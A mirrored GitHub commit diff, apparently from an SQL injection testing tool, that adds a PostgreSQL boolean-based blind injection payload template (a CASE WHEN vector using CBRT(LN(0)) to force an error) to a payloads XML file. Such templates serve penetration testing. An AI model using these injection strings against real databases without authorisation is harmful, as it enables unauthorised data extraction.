Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit fe50d09

Browse files
committed
added new payload for PostgreSQL (parameter replace)
1 parent 9832fc4 commit fe50d09

1 file changed

Lines changed: 19 additions & 0 deletions

File tree

xml/payloads.xml

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -687,6 +687,25 @@ Formats:
687687
</details>
688688
</test>
689689

690+
<test>
691+
<title>PostgreSQL boolean-based blind - Parameter replace (CBRT(LN(0)) - original value)</title>
692+
<stype>1</stype>
693+
<level>3</level>
694+
<risk>1</risk>
695+
<clause>1,2,3</clause>
696+
<where>3</where>
697+
<vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CBRT(LN(0)) END)</vector>
698+
<request>
699+
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CBRT(LN(0)) END)</payload>
700+
</request>
701+
<response>
702+
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CBRT(LN(0)) END)</comparison>
703+
</response>
704+
<details>
705+
<dbms>PostgreSQL</dbms>
706+
</details>
707+
</test>
708+
690709
<test>
691710
<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
692711
<stype>1</stype>

0 commit comments

Comments
 (0)